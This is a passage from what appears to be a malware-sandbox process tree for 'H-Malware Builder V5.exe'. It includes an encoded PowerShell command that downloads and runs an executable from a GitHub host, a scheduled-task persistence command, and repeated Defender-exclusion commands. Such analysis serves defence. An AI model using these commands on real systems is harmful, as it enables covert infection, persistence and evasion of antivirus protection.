sAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ATQBhAGwAdwBhAHIAZQBUAGUAYQBtAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
-
-
C:\Windows\SYSTEM32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:5036
-
-
C:\Windows\SYSTEM32\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:4860 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3008
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"3⤵
- Checks computer location settings
- Drops startup file
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:4580
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"4⤵
- Checks computer location settings
- Drops startup file
PID:3788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4104 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:3804
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"5⤵
- Checks computer location settings
- Drops startup file
PID:4732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:1180 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:3496
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"6⤵
- Checks computer location settings
- Drops startup file
PID:2240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5076 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:4952
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"7⤵
- Checks computer location settings
- Drops startup file
PID:428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'8⤵
- Command and Scripting Interpreter: PowerShell
PID:3212 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Suspicious use of SetWindowsHookEx
PID:3144
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"8⤵
- Checks computer location settings
PID:2096 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'9⤵
- Command and Scripting Interpreter: PowerShell
PID:2956 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
PID:4752
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"9⤵
- Checks computer location settings
- Drops startup file
PID:4532 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'10⤵
- Command and Scripting Interpreter: PowerShell
PID:2040
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"10⤵
- Checks computer location settings
- Drops startup file
PID:3708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'11⤵
- Command and Scripting Interpreter: PowerShell
PID:3588 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of SetWindowsHookEx
PID:880
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"11⤵
- Checks computer location settings
- Drops startup file
PID:2652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'12⤵
- Command and Scripting Interpreter: PowerShell
PID:3252 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Suspicious use of SetWindowsHookEx
PID:3372
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"12⤵
- Checks computer location settings
- Drops startup file
PID:1164 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'13⤵
- Command and Scripting Interpreter: PowerShell
PID:1128 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Suspicious use of SetWindowsHookEx
PID:4764
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"13⤵
- Checks computer location settings
- Drops startup file
PID:3356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'14⤵
- Command and Scripting Interpreter: PowerShell
PID:1380
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"14⤵
- Checks computer location settings
- Drops startup file
PID:4444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'15⤵
- Command and Scripting Interpreter: PowerShell
PID:1764 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Suspicious use of SetWindowsHookEx
PID:2408
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"15⤵
- Checks computer location settings
- Drops startup file
PID:5104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'16⤵
- Command and Scripting Interpreter: PowerShell
PID:4540 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV117⤵
- Suspicious use of SetWindowsHookEx
PID:2332
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"16⤵
- Checks computer location settings
- Drops startup file
PID:3612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'17⤵
- Command and Scripting Interpreter: PowerShell
PID:2004 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵
- Suspicious use of SetWindowsHookEx
PID:1880
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"17⤵
- Checks computer location settings
- Drops startup file
PID:3272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'18⤵
- Command and Scripting Interpreter: PowerShell
PID:1820 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV119⤵
- Suspicious use of SetWindowsHookEx
PID:3500
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"18⤵
- Checks computer location settings
- Drops startup file
PID:3436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'19⤵
- Command and Scripting Interpreter: PowerShell
PID:1964 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵PID:3032
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"19⤵
- Checks computer location settings
- Drops startup file
PID:4656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'20⤵
- Command and Scripting Interpreter: PowerShell
PID:3772
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"20⤵
- Checks computer location settings
- Drops startup file
PID:4772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'21⤵
- Command and Scripting Interpreter: PowerShell
PID:468 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV122⤵
- Suspicious use of SetWindowsHookEx
PID:2660
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"21⤵
- Checks computer location settings
- Drops startup file
PID:5104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'22⤵
- Command and Scripting Interpreter: PowerShell
PID:2916 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV123⤵
- Suspicious use of SetWindowsHookEx
PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"22⤵
- Checks computer location settings
- Drops startup file
PID:1128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'23⤵
- Command and Scripting Interpreter: PowerShell
PID:2656 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV124⤵
- Suspicious use of SetWindowsHookEx
PID:4444
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"23⤵
- Checks computer location settings
- Drops startup file
PID:1764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'24⤵
- Command and Scripting Interpreter: PowerShell
PID:1424 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV125⤵PID:4540
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"24⤵
- Checks computer location settings
- Drops startup file
PID:4288 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'25⤵
- Command and Scripting Interpreter: PowerShell
PID:2320 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV126⤵
- Suspicious use of SetWindowsHookEx
PID:4356
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"25⤵
- Checks computer location settings
- Drops startup file
PID:3144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'26⤵
- Command and Scripting Interpreter: PowerShell
PID:4448 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵
- Suspicious use of SetWindowsHookEx
PID:3996
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"26⤵
- Checks computer location settings
- Drops startup file
PID:3760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'27⤵
- Command and Scripting Interpreter: PowerShell
PID:1048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV128⤵
- Suspicious use of SetWindowsHookEx
PID:2724
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"27⤵
- Checks computer location settings
- Drops startup file
PID:2572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'28⤵
- Command and Scripting Interpreter: PowerShell
PID:4932 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV129⤵PID:1932
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"28⤵
- Checks computer location settings
- Drops startup file
PID:2004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'29⤵
- Command and Scripting Interpreter: PowerShell
PID:456 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV130⤵PID:4448
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"29⤵
- Checks computer location settings
- Drops startup file
PID:2928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'30⤵
- Command and Scripting Interpreter: PowerShell
PID:5104 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV131⤵
- Suspicious use of SetWindowsHookEx
PID:3252
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"30⤵
- Checks computer location settings
- Drops startup file
PID:1380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'31⤵
- Command and Scripting Interpreter: PowerShell
PID:212 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV132⤵PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"31⤵
- Checks computer location settings
- Drops startup file
PID:2780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'32⤵
- Command and Scripting Interpreter: PowerShell
PID:1488 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV133⤵PID:5052
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"32⤵
- Checks computer location settings
- Drops startup file
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'33⤵
- Command and Scripting Interpreter: PowerShell
PID:4520 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV134⤵
- Suspicious use of SetWindowsHookEx
PID:348
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"33⤵
- Checks computer location settings
- Drops startup file
PID:1128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'34⤵
- Command and Scripting Interpreter: PowerShell
PID:1196 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵
- Suspicious use of SetWindowsHookEx
PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"34⤵
- Checks computer location settings
- Drops startup file
PID:5024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'35⤵
- Command and Scripting Interpreter: PowerShell
PID:4848 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV136⤵
- Suspicious use of SetWindowsHookEx
PID:4436
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"35⤵
- Checks computer location settings
- Drops startup file
PID:2972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'36⤵
- Command and Scripting Interpreter: PowerShell
PID:3200 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV137⤵
- Suspicious use of SetWindowsHookEx
PID:5100
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"36⤵
- Checks computer location settings
- Drops startup file
PID:2912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'37⤵
- Command and Scripting Interpreter: PowerShell
PID:4420 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV138⤵
- Suspicious use of SetWindowsHookEx
PID:2188
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"37⤵
- Checks computer location settings
- Drops startup file
PID:3824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'38⤵
- Command and Scripting Interpreter: PowerShell
PID:612 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV139⤵
- Suspicious use of SetWindowsHookEx
PID:4380
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"38⤵
- Checks computer location settings
- Drops startup file
PID:4240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'39⤵
- Command and Scripting Interpreter: PowerShell
PID:4036
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"39⤵
- Checks computer location settings
- Drops startup file
PID:4664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'40⤵
- Command and Scripting Interpreter: PowerShell
PID:4512 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV141⤵
- Suspicious use of SetWindowsHookEx
PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"40⤵
- Checks computer location settings
- Drops startup file
PID:1992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'41⤵
- Command and Scripting Interpreter: PowerShell
PID:2836 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV142⤵
- Suspicious use of SetWindowsHookEx
PID:3532
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"41⤵
- Checks computer location settings
- Drops startup file
PID:4708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'42⤵
- Command and Scripting Interpreter: PowerShell
PID:4368 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV143⤵
- Suspicious use of SetWindowsHookEx
PID:3772
-
-
-
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"42⤵
- Checks computer location settings
- Drops startup file
PID:1968 -
